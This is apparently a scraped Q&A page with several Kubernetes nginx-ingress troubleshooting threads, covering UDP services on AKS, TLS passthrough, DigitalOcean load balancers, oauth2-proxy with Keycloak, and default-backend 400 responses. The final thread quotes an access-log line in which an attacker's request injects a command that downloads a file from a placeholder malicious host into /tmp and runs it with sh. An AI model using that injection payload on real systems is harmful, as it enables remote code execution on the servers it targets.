Currently I am using helm chart of kubernetes nginx ingress to configure the UDP listener . Here are my helm chart files config -
I have added - udp-services-configmap: $(POD_NAMESPACE)/nginx-ingress-udp as part of extra arguments.
here is my helm values file -
## nginx configuration
## Ref: https://github.com/kubernetes/ingress-nginx/blob/master/controllers/nginx/configuration.md
##
controller:
image:
repository: k8s.gcr.io/ingress-nginx/controller
tag: "v0.40.2"
digest: sha256:46ba23c3fbaafd9e5bd01ea85b2f921d9f2217be082580edc22e6c704a83f02f
pullPolicy: IfNotPresent
runAsUser: 101
allowPrivilegeEscalation: true
# Configures the ports the nginx-controller listens on
containerPort:
http: 80
https: 443
udp: 9012
dnsPolicy: ClusterFirst
reportNodeInternalIp: false
hostNetwork: false
hostPort:
enabled: true
ports:
udp: 9012
# http: 80
# https: 443
electionID: ingress-controller-leader
ingressClass: nginx
publishService:
enabled: true
pathOverride: ""
scope:
enabled: false
namespace: "" # defaults to .Release.Namespace
configMapNamespace: "" # defaults to .Release.Namespace
tcp:
configMapNamespace: "" # defaults to .Release.Namespace
annotations: {}
udp:
configMapNamespace: "" # defaults to .Release.Namespace
annotations: {}
extraArgs:
udp-services-configmap: $(POD_NAMESPACE)/nginx-ingress-udp
extraEnvs: []
kind: Deployment
annotations: {}
updateStrategy:
rollingUpdate:
maxUnavailable: 1
type: RollingUpdate
minReadySeconds: 0
nodeSelector:
kubernetes.io/os: linux
livenessProbe:
failureThreshold: 5
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
port: 10254
readinessProbe:
failureThreshold: 3
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
port: 10254
healthCheckPath: "/healthz"
podAnnotations: {}
replicaCount: 1
minAvailable: 1
resources:
requests:
cpu: 100m
memory: 90Mi
autoscaling:
enabled: false
minReplicas: 1
maxReplicas: 11
targetCPUUtilizationPercentage: 50
targetMemoryUtilizationPercentage: 50
autoscalingTemplate: []
enableMimalloc: true
customTemplate:
configMapName: ""
configMapKey: ""
service:
enabled: true
annotations: {}
labels: {}
externalIPs: []
loadBalancerSourceRanges: []
enableHttp: true
enableHttps: true
ports:
http: 80
https: 443
udp: 9012
targetPorts:
http: http
https: https
udp: 9012
type: LoadBalancer
nodePorts:
http: ""
https: ""
tcp: {}
udp: {}
internal:
enabled: false
annotations: {}
extraContainers: []
extraVolumeMounts: []
extraVolumes: []
extraInitContainers: []
admissionWebhooks:
annotations: {}
enabled: true
failurePolicy: Fail
port: 8443
certificate: "/usr/local/certificates/cert"
key: "/usr/local/certificates/key"
namespaceSelector: {}
objectSelector: {}
service:
annotations: {}
externalIPs: []
loadBalancerSourceRanges: []
servicePort: 443
type: ClusterIP
patch:
enabled: true
image:
repository: docker.io/jettech/kube-webhook-certgen
tag: v1.3.0
pullPolicy: IfNotPresent
priorityClassName: ""
podAnnotations: {}
nodeSelector: {}
tolerations: []
runAsUser: 2000
tcp: {}
udp: {}
So also I have added the configmap -
apiVersion: v1
kind: ConfigMap
metadata:
name: nginx-ingress-udp
namespace: ingress-nginx
data:
9012: "services/service-listener:9012"
So the outcome is here is the ingress service -
Now that I trying to get the service here are two problems -
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
iot-ingress-ingress-nginx-controller LoadBalancer 10.0.209.232 150.22.44.23 80:31694/TCP,443:30330/TCP 5h42m
I do not see the exposed 9012 port as UDP .
How am I supposed to invoke by load balancer ip for the UDP . Say if I want to connect to the port 9012 by the load balancer IP 150.22.44.23 ?
IS it at all necessary we have to use hostport/hostnetwork afterall ? I am not sure please guide . My end goal is #2
I am using AKS btw .
According to nginx documentation after creating a configmap for UDP Load Balancing you have to create a service that will expose those ports for the ingress.
You can do it by following official guide, example:
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx
labels:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
spec:
type: LoadBalancer
ports:
- name: proxied-tcp-9012
port: 9012
targetPort: 9012
protocol: UDP
selector:
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/part-of: ingress-nginx
And the output will be similar to this:
$kubectl get svc | grep ingress-nginx
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S)
ingress-nginx LoadBalancer 10.0.0.237 12.345.67.89 9012:32291/UDP
Related
I have deployed NGINX-Operator and NGINX-Ingress-Controller per the following github and the secrets from devopscube.
The current setup is:
AWS Classic LB -> ROSA Cluster [Helm NGINX-Ingress-Controller -> NGINX-Ingress -> Service -> Pod]
Here is the YAML file I used to create the NGINX-Ingress-Controller Resource. You will see that enableTLSPassthrough is set to true. However, I am unsure this is taking effect. My goal here is end to end TLS encryption from client to the NGINX service/pod. Right now I am met with error code 400 when accessing in browser through http (http works perfect fine in hello-world set up).
"400 Bad Request The plain HTTP request was sent to HTTPS port"
kind: NginxIngress
apiVersion: charts.nginx.org/v1alpha1
metadata:
name: nginxingress
namespace: nginx-ingress
spec:
controller:
affinity: {}
appprotect:
enable: false
appprotectdos:
debug: false
enable: false
maxDaemons: 0
maxWorkers: 0
memory: 0
config:
annotations: {}
entries: {}
customPorts: []
defaultTLS:
secret: nginx-ingress/default-server-secret
enableCertManager: false
enableCustomResources: true
enableExternalDNS: false
enableLatencyMetrics: false
enableOIDC: false
enablePreviewPolicies: false
enableSnippets: false
enableTLSPassthrough: true
extraContainers: []
globalConfiguration:
create: false
spec: {}
healthStatus: false
healthStatusURI: /nginx-health
hostNetwork: false
image:
pullPolicy: IfNotPresent
repository: nginx/nginx-ingress
tag: 2.3.0-ubi
ingressClass: nginx
initContainers: []
kind: deployment
logLevel: 1
nginxDebug: false
nginxReloadTimeout: 60000
nginxStatus:
allowCidrs: 127.0.0.1
enable: true
port: 8080
nginxplus: false
nodeSelector: {}
pod:
annotations: {}
extraLabels: {}
priorityClassName: null
readyStatus:
enable: true
port: 8081
replicaCount: 1
reportIngressStatus:
annotations: {}
enable: true
enableLeaderElection: true
ingressLink: ''
resources:
requests:
cpu: 100m
memory: 128Mi
service:
annotations: {}
create: true
customPorts: []
externalIPs: []
externalTrafficPolicy: Local
extraLabels: {}
httpPort:
enable: true
nodePort: ''
port: 80
targetPort: 80
httpsPort:
enable: true
nodePort: ''
port: 443
targetPort: 443
loadBalancerIP: ''
loadBalancerSourceRanges: []
type: LoadBalancer
serviceAccount:
imagePullSecretName: ''
setAsDefaultIngress: true
terminationGracePeriodSeconds: 30
tolerations: []
volumeMounts: []
volumes: []
watchNamespace: ''
wildcardTLS:
secret: null
nginxServiceMesh:
enable: false
enableEgress: false
prometheus:
create: true
port: 9113
scheme: http
secret: ''
rbac:
create: true
Taking a look at the NGINX-Ingress-Controller pod logs on creation I can see nothing about TLS being enabled. A flag does get set in the args section once the pod deploys but I am still unsure this is working.
W0802 20:33:26.594545 1 flags.go:273] Ignoring unhandled arguments: []
I0802 20:33:26.594683 1 flags.go:190] Starting NGINX Ingress Controller Version=2.3.0 PlusFlag=false
I0802 20:33:26.594689 1 flags.go:191] Commit=979db22d8065b22fedb410c9b9c5875cf0a6dc66 Date=2022-07-12T08:51:24Z DirtyState=false Arch=linux/amd64 Go=go1.18.3
I0802 20:33:26.601340 1 main.go:210] Kubernetes version: 1.22.0
I0802 20:33:26.606551 1 main.go:326] Using nginx version: nginx/1.23.0
2022/08/02 20:33:26 [notice] 13#13: using the "epoll" event method
2022/08/02 20:33:26 [notice] 13#13: nginx/1.23.0
2022/08/02 20:33:26 [notice] 13#13: built by gcc 8.5.0 20210514 (Red Hat 8.5.0-4) (GCC)
2022/08/02 20:33:26 [notice] 13#13: OS: Linux 4.18.0-305.19.1.el8_4.x86_64
2022/08/02 20:33:26 [notice] 13#13: getrlimit(RLIMIT_NOFILE): 1048576:1048576
2022/08/02 20:33:26 [notice] 13#13: start worker processes
2022/08/02 20:33:26 [notice] 13#13: start worker process 15
2022/08/02 20:33:26 [notice] 13#13: start worker process 16
2022/08/02 20:33:26 [notice] 13#13: start worker process 17
2022/08/02 20:33:26 [notice] 13#13: start worker process 18
I0802 20:33:26.630298 1 listener.go:54] Starting Prometheus listener on: :9113/metrics
I0802 20:33:26.630860 1 leaderelection.go:248] attempting to acquire leader lease nginx-ingress/nginxingress-nginx-ingress-leader-election...
I0802 20:33:26.639466 1 leaderelection.go:258] successfully acquired lease nginx-ingress/nginxingress-nginx-ingress-leader-election
Here is the Ingress Resource YAML
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: nginx-ingress
annotations:
# kubernetes.io/ingress.class: addon-http-application-routing
# nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
# nginx.ingress.kubernetes.io/ssl-redirect: "true"
# nginx.ingress.kubernetes.io/proxy-redirect-from: https
# nginx.ingress.kubernetes.io/proxy-redirect-to: https
nginx.ingress.kubernetes.io/backend-protocol: "HTTPS"
# nginx.ingress.kubernetes.io/proxy-ssl-protocols: "HTTPS"
# nginx.ingress.kubernetes.io/secure-backends: "true"
spec:
defaultBackend:
service:
name: nginx
port:
number: 443
ingressClassName: nginx
tls:
- hosts:
- nginx-tlssni.apps.clustername.openshiftapps.com
secretName: nginx-tls
rules:
- host: "nginx-tlssni.apps.clustername.openshiftapps.com"
http:
paths:
- pathType: Prefix
path: /
backend:
service:
name: nginx
port:
number: 443
Thank you for your insight :)
there are many kinds of NGINX based ingress controllers. The two that are most easily confused are the NGINX INC ingress controller, and the CNCF Kubernetes Ingress Controller.
My understanding is that nginx.ingress.kubernetes.io/backend-protocol: "HTTPS" is for the CNCF Kubernetes Ingress Controller.
Now to your question - based on this example, try changing your annotations to the following:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: nginx-ingress
annotations:
nginx.org/ssl-services: "nginx" # Name of your k8s service with TLS
...
I have my A record on Netlify mapped to my Load Balancer IP Address on Digital Ocean, and it's able to hit the nginx server, but I'm getting a 404 when trying to access any of the apps APIs. I noticed that the status of my Ingress doesn't show that it is bound to the Load Balancer.
Does anybody know what I am missing to get this setup?
Application Ingress:
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: d2d-server
spec:
rules:
- host: api.cloud.myhostname.com
http:
paths:
- backend:
service:
name: d2d-server
port:
number: 443
path: /
pathType: ImplementationSpecific
Application Service:
apiVersion: v1
kind: Service
metadata:
name: d2d-server
spec:
selector:
app: d2d-server
ports:
- name: http-api
protocol: TCP
port: 443
targetPort: 8080
type: ClusterIP
Ingress Controller:
apiVersion: apps/v1
kind: Deployment
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
uid: fc64d9f6-a935-49b2-9d7a-b862f660a4ea
resourceVersion: '257931'
generation: 1
creationTimestamp: '2021-10-22T05:31:26Z'
labels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/version: 1.0.4
helm.sh/chart: ingress-nginx-4.0.6
annotations:
deployment.kubernetes.io/revision: '1'
spec:
replicas: 1
selector:
matchLabels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
template:
metadata:
creationTimestamp: null
labels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
spec:
volumes:
- name: webhook-cert
secret:
secretName: ingress-nginx-admission
defaultMode: 420
containers:
- name: controller
image: >-
k8s.gcr.io/ingress-nginx/controller:v1.0.4#sha256:545cff00370f28363dad31e3b59a94ba377854d3a11f18988f5f9e56841ef9ef
args:
- /nginx-ingress-controller
- '--publish-service=$(POD_NAMESPACE)/ingress-nginx-controller'
- '--election-id=ingress-controller-leader'
- '--controller-class=k8s.io/ingress-nginx'
- '--configmap=$(POD_NAMESPACE)/ingress-nginx-controller'
- '--validating-webhook=:8443'
- '--validating-webhook-certificate=/usr/local/certificates/cert'
- '--validating-webhook-key=/usr/local/certificates/key'
ports:
- name: http
containerPort: 80
protocol: TCP
- name: https
containerPort: 443
protocol: TCP
- name: webhook
containerPort: 8443
protocol: TCP
env:
- name: POD_NAME
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
- name: LD_PRELOAD
value: /usr/local/lib/libmimalloc.so
resources:
requests:
cpu: 100m
memory: 90Mi
volumeMounts:
- name: webhook-cert
readOnly: true
mountPath: /usr/local/certificates/
livenessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 1
periodSeconds: 10
successThreshold: 1
failureThreshold: 5
readinessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 1
periodSeconds: 10
successThreshold: 1
failureThreshold: 3
lifecycle:
preStop:
exec:
command:
- /wait-shutdown
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
imagePullPolicy: IfNotPresent
securityContext:
capabilities:
add:
- NET_BIND_SERVICE
drop:
- ALL
runAsUser: 101
allowPrivilegeEscalation: true
restartPolicy: Always
terminationGracePeriodSeconds: 300
dnsPolicy: ClusterFirst
nodeSelector:
kubernetes.io/os: linux
serviceAccountName: ingress-nginx
serviceAccount: ingress-nginx
securityContext: {}
schedulerName: default-scheduler
strategy:
type: RollingUpdate
rollingUpdate:
maxUnavailable: 25%
maxSurge: 25%
revisionHistoryLimit: 10
progressDeadlineSeconds: 600
Load Balancer:
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
labels:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/version: 1.0.4
helm.sh/chart: ingress-nginx-4.0.6
annotations:
kubernetes.digitalocean.com/load-balancer-id: <LB_ID>
service.beta.kubernetes.io/do-loadbalancer-enable-proxy-protocol: 'true'
service.beta.kubernetes.io/do-loadbalancer-name: ingress-nginx
service.beta.kubernetes.io/do-loadbalancer-protocol: https
status:
loadBalancer:
ingress:
- ip: <IP_HIDDEN>
spec:
ports:
- name: http
protocol: TCP
appProtocol: http
port: 80
targetPort: http
nodePort: 31661
- name: https
protocol: TCP
appProtocol: https
port: 443
targetPort: https
nodePort: 32761
selector:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/name: ingress-nginx
clusterIP: <IP_HIDDEN>
clusterIPs:
- <IP_HIDDEN>
type: LoadBalancer
sessionAffinity: None
externalTrafficPolicy: Local
healthCheckNodePort: 30477
ipFamilies:
- IPv4
ipFamilyPolicy: SingleStack
I just needed to add the field ingressClassName of nginx to the ingress spec.
The kind: ingress are proxy rules about managing traffic from the Ingress Controller to the incluster services. But to achive this, outside traffic needs to reach Ingress Controller.
https://kubernetes.io/docs/concepts/services-networking/ingress/#what-is-ingress
lets assume that "client" is our Loadbalancer
So what I assume you want to do is to point your LoadBalancer to the Ingress Controler and then, based on you Ingress rules, it will route traffic to you ( in this case ) d2d service.
To point a LB to a pod, you need to create a Service resource with spec.type: Loadbalancer field. I modify an example from digital ocean that should match your needs. Notice the annotation of the Service that can modify the Loadbalancer params, more on this you can find here: https://github.com/digitalocean/digitalocean-cloud-controller-manager/blob/master/docs/controllers/services/annotations.md
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
annotations:
# #Edit set it to http since no certyficate is provided
service.beta.kubernetes.io/do-loadbalancer-protocol: "http"
service.beta.kubernetes.io/do-loadbalancer-name: "<YOUR_LB_NAME>"
spec:
type: LoadBalancer
selector:
app.kubernetes.io/component: controller
app.kubernetes.io/instance: ingress-nginx
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: ingress-nginx
app.kubernetes.io/version: 1.0.4
helm.sh/chart: ingress-nginx-4.0.6
ports:
- name: http
protocol: TCP
port: 80
targetPort: 80
- name: https
protocol: TCP
port: 443
targetPort: 443
- name: webhook
protocol: TCP
port: 8443
targetPort: 8443
I'm trying to run a minimalistic sample of oauth2-proxy with Keycloak. I used oauth2-proxy's k8s example, which uses dex, to build up my keycloak example.
The problem is that I don't seem to get the proxy to work:
# kubectl get pods
NAME READY STATUS RESTARTS AGE
httpbin-774999875d-zbczh 1/1 Running 0 2m49s
keycloak-758d7c758-27pgh 1/1 Running 0 2m49s
oauth2-proxy-5875dd67db-8qwqn 0/1 CrashLoopBackOff 2 2m49s
Logs indicate a network error:
# kubectl logs oauth2-proxy-5875dd67db-8qwqn
[2021/09/22 08:14:56] [main.go:54] Get "http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration": dial tcp 127.0.0.1:80: connect: connection refused
I believe I have set up the ingress correctly, though.
Steps to reproduce
Set up the cluster:
#Creare kind cluster
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/kind-cluster.yaml
kind create cluster --name oauth2-proxy --config kind-cluster.yaml
#Setup dns
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/custom-dns.yaml
kubectl apply -f custom-dns.yaml
kubectl -n kube-system rollout restart deployment/coredns
kubectl -n kube-system rollout status --timeout 5m deployment/coredns
#Setup ingress
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/static/provider/kind/deploy.yaml
kubectl --namespace ingress-nginx rollout status --timeout 5m deployment/ingress-nginx-controller
#Deploy
#import keycloak master realm
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/keycloak/master-realm.json
kubectl create configmap keycloak-import-config --from-file=master-realm.json=master-realm.json
Deploy the test application. My deployment.yaml file:
###############oauth2-proxy#############
apiVersion: apps/v1
kind: Deployment
metadata:
creationTimestamp: null
labels:
name: oauth2-proxy
name: oauth2-proxy
spec:
replicas: 1
selector:
matchLabels:
name: oauth2-proxy
template:
metadata:
labels:
name: oauth2-proxy
spec:
containers:
- args:
- --provider=oidc
- --oidc-issuer-url=http://keycloak.localtest.me/auth/realms/master
- --upstream="file://dev/null"
- --client-id=oauth2-proxy
- --client-secret=72341b6d-7065-4518-a0e4-50ee15025608
- --cookie-secret=x-1vrrMhC-886ITuz8ySNw==
- --email-domain=*
- --scope=openid profile email users
- --cookie-domain=.localtest.me
- --whitelist-domain=.localtest.me
- --pass-authorization-header=true
- --pass-access-token=true
- --pass-user-headers=true
- --set-authorization-header=true
- --set-xauthrequest=true
- --cookie-refresh=1m
- --cookie-expire=30m
- --http-address=0.0.0.0:4180
image: quay.io/oauth2-proxy/oauth2-proxy:latest
# image: "quay.io/pusher/oauth2_proxy:v5.1.0"
name: oauth2-proxy
ports:
- containerPort: 4180
name: http
protocol: TCP
livenessProbe:
httpGet:
path: /ping
port: http
scheme: HTTP
initialDelaySeconds: 0
timeoutSeconds: 1
readinessProbe:
httpGet:
path: /ping
port: http
scheme: HTTP
initialDelaySeconds: 0
timeoutSeconds: 1
successThreshold: 1
periodSeconds: 10
resources:
{}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: oauth2-proxy
name: oauth2-proxy
spec:
type: ClusterIP
ports:
- port: 4180
targetPort: 4180
name: http
selector:
name: oauth2-proxy
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
labels:
app: oauth2-proxy
name: oauth2-proxy
annotations:
nginx.ingress.kubernetes.io/server-snippet: |
large_client_header_buffers 4 32k;
spec:
rules:
- host: oauth2-proxy.localtest.me
http:
paths:
- path: /
backend:
serviceName: oauth2-proxy
servicePort: 4180
---
# ######################httpbin##################
apiVersion: apps/v1
kind: Deployment
metadata:
name: httpbin
spec:
replicas: 1
selector:
matchLabels:
name: httpbin
template:
metadata:
labels:
name: httpbin
spec:
containers:
- image: kennethreitz/httpbin:latest
name: httpbin
resources: {}
ports:
- name: http
containerPort: 80
protocol: TCP
livenessProbe:
httpGet:
path: /
port: http
readinessProbe:
httpGet:
path: /
port: http
hostname: httpbin
restartPolicy: Always
---
apiVersion: v1
kind: Service
metadata:
name: httpbin-svc
labels:
app: httpbin
spec:
type: ClusterIP
ports:
- port: 80
targetPort: http
protocol: TCP
name: http
selector:
name: httpbin
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: httpbin
labels:
name: httpbin
annotations:
nginx.ingress.kubernetes.io/auth-response-headers: X-Auth-Request-User,X-Auth-Request-Email
nginx.ingress.kubernetes.io/auth-signin: http://oauth2-proxy.localtest.me/oauth2/start
nginx.ingress.kubernetes.io/auth-url: http://oauth2-proxy.localtest.me/oauth2/auth
spec:
rules:
- host: httpbin.localtest.me
http:
paths:
- path: /
backend:
serviceName: httpbin-svc
servicePort: 80
---
# ######################keycloak#############
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: keycloak
name: keycloak
spec:
replicas: 1
selector:
matchLabels:
app: keycloak
template:
metadata:
labels:
app: keycloak
spec:
containers:
- args:
- -Dkeycloak.migration.action=import
- -Dkeycloak.migration.provider=singleFile
- -Dkeycloak.migration.file=/etc/keycloak_import/master-realm.json
- -Dkeycloak.migration.strategy=IGNORE_EXISTING
env:
- name: KEYCLOAK_PASSWORD
value: password
- name: KEYCLOAK_USER
value: admin#example.com
- name: KEYCLOAK_HOSTNAME
value: keycloak.localtest.me
- name: PROXY_ADDRESS_FORWARDING
value: "true"
image: quay.io/keycloak/keycloak:15.0.2
# image: jboss/keycloak:10.0.0
name: keycloak
ports:
- name: http
containerPort: 8080
- name: https
containerPort: 8443
readinessProbe:
httpGet:
path: /auth/realms/master
port: 8080
volumeMounts:
- mountPath: /etc/keycloak_import
name: keycloak-config
hostname: keycloak
volumes:
- configMap:
defaultMode: 420
name: keycloak-import-config
name: keycloak-config
---
apiVersion: v1
kind: Service
metadata:
name: keycloak-svc
labels:
app: keycloak
spec:
type: ClusterIP
sessionAffinity: None
ports:
- name: http
targetPort: http
port: 8080
selector:
app: keycloak
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: keycloak
spec:
tls:
- hosts:
- "keycloak.localtest.me"
rules:
- host: "keycloak.localtest.me"
http:
paths:
- path: /
backend:
serviceName: keycloak-svc
servicePort: 8080
---
# kubectl apply -f deployment.yaml
Configure /etc/hosts on the development machine file to include localtest.me domain:
127.0.0.1 oauth2-proxy.localtest.me
127.0.0.1 keycloak.localtest.me
127.0.0.1 httpbin.localtest.me
127.0.0.1 localhost
Note that I can reach http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration with no problem from my host browser. It appears that the oauth2-proxy's pod cannot reach the service via the ingress. Would really appreciate any sort of help here.
Turned out that I needed to add keycloak to custom-dns.yaml.
apiVersion: v1
data:
Corefile: |
.:53 {
errors
health {
lameduck 5s
}
ready
kubernetes cluster.local in-addr.arpa ip6.arpa {
pods insecure
fallthrough in-addr.arpa ip6.arpa
ttl 30
}
prometheus :9153
forward . /etc/resolv.conf
cache 30
loop
reload
loadbalance
hosts {
10.244.0.1 dex.localtest.me. # <----Configured for dex
10.244.0.1 oauth2-proxy.localtest.me
fallthrough
}
}
kind: ConfigMap
metadata:
name: coredns
namespace: kube-system
Added keycloak showed as below:
apiVersion: v1
data:
Corefile: |
.:53 {
errors
health {
lameduck 5s
}
ready
kubernetes cluster.local in-addr.arpa ip6.arpa {
pods insecure
fallthrough in-addr.arpa ip6.arpa
ttl 30
}
prometheus :9153
forward . /etc/resolv.conf
cache 30
loop
reload
loadbalance
hosts {
10.244.0.1 keycloak.localtest.me
10.244.0.1 oauth2-proxy.localtest.me
fallthrough
}
}
kind: ConfigMap
metadata:
name: coredns
namespace: kube-system
I have an issue where all unknown endpoints are getting 400s returned by the ingress-controller itself. It does not send any traffic to the default backend. Other traffic to defined Ingress points is working fine.
I have seen this in my ingress-controller's logs because every night I get what look to be hand-rolled compromise-attempts, and I assume that the attacker (or script) keep trying because they're getting 400s and not 404s, and these are then presumed to be potentially accessible endpoints when they are not.
I am unsure if it's due to the way I deployed my nginx-ingress-controller or if it's because of how I have set up my ingresses. The ingress-controller is a really just a generic Helm deployment.
Here is part of its deployment manifest:
Name: fashionable-gopher-nginx-ingress-controller
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=controller
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=controller,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=controller
release=fashionable-gopher
Service Account: fashionable-gopher-nginx-ingress
Containers:
nginx-ingress-controller:
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
Ports: 80/TCP, 443/TCP
Host Ports: 0/TCP, 0/TCP
Args:
/nginx-ingress-controller
--default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
Here's an example 400 in the logs, which should be a 404 (no "login.cgi" endpoint exists anywhere):
10.244.3.1 - [10.244.3.1] - - [22/Aug/2018:23:52:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://some.malicious.ip.address/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 174 "-" "Hakai/2.0" 203 0.000 [] - - - -
Here's the default backend:
Name: fashionable-gopher-nginx-ingress-default-backend
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=default-backend
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=default-backend,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=default-backend
release=fashionable-gopher
Containers:
nginx-ingress-default-backend:
Image: k8s.gcr.io/defaultbackend:1.3
Lastly, here are some pieces from the nginx.conf in the ingress-controller and I'm not an expert in nginx.confs but it looks correct to me:
...
upstream upstream-default-backend {
least_conn;
keepalive 32;
}
server 10.100.3.10:8080 max_fails=0 fail_timeout=0;
location / {
log_by_lua_block {
}
if ($scheme = https) {
more_set_headers "Strict-Transport-Security: max-age=15724800; includeSubDomains";
}
access_log off;
port_in_redirect off;
set $proxy_upstream_name "upstream-default-backend";
set $namespace "";
set $ingress_name "";
set $service_name "";
client_max_body_size "1m";
# In case of errors try the next upstream server before returning an error
proxy_next_upstream error timeout invalid_header http_502 http_503 http_504;
proxy_next_upstream_tries 0;
proxy_pass http://upstream-default-backend;
proxy_redirect off;
}
One note: before I set up my first ingresses (for other domains), then traffic did make it to my default backend and throw 404s.
What should I do now to debug this issue and figure out why these 400s are not getting sent to my default backend?
Edit:
Here's the default-controller's deployment definition:
kubectl get deployment fashionable-gopher-nginx-ingress-default-backend -o yaml -n kube-system
apiVersion: extensions/v1beta1
kind: Deployment
metadata: annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: 2018-07-03T21:02:46Z
generation: 1
labels:
app: nginx-ingress
chart: nginx-ingress-0.20.3
component: default-backend
heritage: Tiller
release: fashionable-gopher
name: fashionable-gopher-nginx-ingress-default-backend
namespace: kube-system resourceVersion:
progressDeadlineSeconds: 600 replicas: 1 revisionHistoryLimit: 10 selector:
matchLabels:
app: nginx-ingress
component: default-backend
release: fashionable-gopher strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate template:
metadata:
creationTimestamp: null
labels:
app: nginx-ingress
component: default-backend
release: fashionable-gopher
spec:
containers:
- image: k8s.gcr.io/defaultbackend:1.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 8080
scheme: HTTP
initialDelaySeconds: 30
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 5
name: nginx-ingress-default-backend
ports:
- containerPort: 8080
name: http
protocol: TCP
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 60 status: availableReplicas: 1 conditions:
- lastTransitionTime: 2018-07-03T21:02:46Z
lastUpdateTime: 2018-07-03T21:02:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-07-28T16:19:57Z
lastUpdateTime: 2018-07-28T16:22:06Z
message: ReplicaSet "fashionable-gopher-nginx-ingress-default-backend-5ffffffff"
has successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing observedGeneration: 1 readyReplicas: 1 replicas: 1 updatedReplicas: 1
Edit
Here's the only ingress I have defined for now:
Name: default-myserver-ingress
Namespace: default
Address:
Default backend: default-http-backend:80 (<none>)
TLS:
myapp-tls-host-secrets terminates someapp.somehostname.com
Rules:
Host Path Backends
---- ---- --------
someapp.somehostname.com
/ my-api:8000 (<none>)
Annotations:
kubectl.kubernetes.io/last-applied-configuration: {"apiVersion":"extensions/v1beta1","kind":"Ingress","metadata":{"annotations":{"kubernetes.io/ingress.class":"nginx"},"name":"default-myserver-ingress","namespace":"default"},"spec":{"rules":[{"host":"someapp.somehostname.com","http":{"paths":[{"backend":{"serviceName":"my-api","servicePort":8000},"path":"/"}]}}],"tls":[{"hosts":["someapp.somehostname.com"],"secretName":"myapp-tls-host-secrets"}]}}
kubernetes.io/ingress.class: nginx
Events: <none>
